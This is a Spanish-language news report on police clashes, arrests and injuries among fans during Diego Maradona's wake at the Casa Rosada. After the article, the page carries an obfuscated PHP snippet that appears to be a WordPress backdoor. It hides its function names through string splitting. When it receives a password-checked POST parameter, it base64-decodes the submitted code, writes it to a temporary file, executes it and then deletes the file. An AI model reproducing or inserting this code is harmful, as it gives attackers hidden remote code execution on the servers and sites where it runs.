Incidentes y corridas en la despedida de Maradona

Foto: Captura TV / Todo Noticias

Incidentes y corridas se producían esta tarde entre un grupo de fanáticos que intentaba llegar hasta la Casa Rosada para darle el último adiós a Diego Maradona y la Policía.

Poco más de una hora antes de las 16, el límite establecido por la familia del Diez para la realización del velatorio, y con más de 20 cuadras de cola para ingresar a la Casa de Gobierno, comenzaron los disturbios en la intersección de Avenida 9 de Julio y Avenida de Mayo.

Allí las fuerza de seguridad cerraron la fila e impidieron que los fanáticos continúen acercándose a Casa Rosada.

Más tarde, apenas pasadas las 15, la tardía llegada de la barra brava de Gimnasia y Esgrima La Plata, que irrumpió en la Plaza de Mayo e intentó ingresar a la Casa Rosada sin las horas de fila que cumplió el resto de la gente, derivó en nuevas corridas y otra represión policial, esta vez más fuerte y a pocos metros de la puerta de la Casa de Gobierno.

Es más, los Triperos, cuando lograron ingresar, permanecieron un largo rato en el Patio de las palmeras junto a otros hinchas, de donde no lograban sacarlos.

La situación obligó a suspender el valatorio, y al mismo tiempo, en avenida de Mayo y 9 de Julio, cuando todo parecía calmo, comenzaron nuevamente las corridas y los enfrentamientos entre los manifestantes y las fuerzas de seguridad, que comenzaron a reprimir de una manera más agresiva. Allí hubo detenidos y heridos.

Minutos antes de las 18, los restos de Maradona partieron desde la Casa Rosada hacia el cementerio de Bella Vista.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}